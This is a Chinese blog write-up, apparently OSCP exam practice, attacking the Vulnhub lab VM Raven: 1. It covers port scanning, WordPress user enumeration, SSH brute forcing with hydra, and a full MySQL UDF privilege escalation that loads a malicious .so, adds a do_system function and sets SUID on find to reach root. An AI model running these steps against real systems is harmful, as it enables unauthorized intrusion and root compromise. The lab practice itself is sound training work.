OSCP备考_0x13_Vulnhub靶机_Raven: 1

Ethan医生3个月前靶场104
名称说明
靶机下载链接https://www.vulnhub.com/entry/raven-1,256/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.180

image.png

nmap -p- 192.168.233.180 

image.png

nmap -p22,80,111,54309 -A -T4 192.168.233.180


image.png

image.png

gobuster dir -u http://192.168.233.180/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40


image.png

image.png

查找到version是5.2.16版本

查询到cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./phpmail.py

然后修改phpmail.py配置 然后攻击目标机器

image.png


执行不成功 看来还是换打wd看看

wpscan --url http://192.168.233.180/wordpress/ -eu

image.png

找到两个用户尝试爆破看看

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.233.180 ssh


image.png

image.png

到wd底下去看MYSQL配置,密码:R@v3nSecurity

image.png

尝试登入看看

image.png

使用UDP提权 因为启用的ROOT MYSQL


mysql --version

mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3

上传恶意1518.so文件 进行UDF提权

create table ethan(line blob); (blob就是二进制保存)

image.png

insert into ethan value(load_file('/tmp/1518.so')); 将挡案导入到ethan

image.png

select * from ethan into dumpfile '/usr/lib/mysql/plugin/ethan.so'; 将挡案导出到plugin文件内

create function do_system returns integer soname 'ethan.so';

(是 MySQL UDF(用户自定义函数)提权利用的一部分,它的作用是:

告诉 MySQL 加载一个名为 ethan.so 的共享库文件,并将其中的某个函数注册为 SQL 中可以调用的函数 do_system)

image.png


select * from mysql.func;

image.png


调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令:
select do_system('chmod u+s /usr/bin/find');

image.png

find . -exec "id" \;

image.png

image.png



标签: OSCP

相关文章

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)nmap -sU --top-ports 100 10.129.3.15...

OSCP备考_0x39_HackThBox靶机_Windows_Optimum

OSCP备考_0x39_HackThBox靶机_Windows_Optimum

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)查看到版本是2.3,有rcepython3 49125.p...

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....

OSCP备考_0x43_HackThBox靶机_Windows_arctic

OSCP备考_0x43_HackThBox靶机_Windows_arctic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。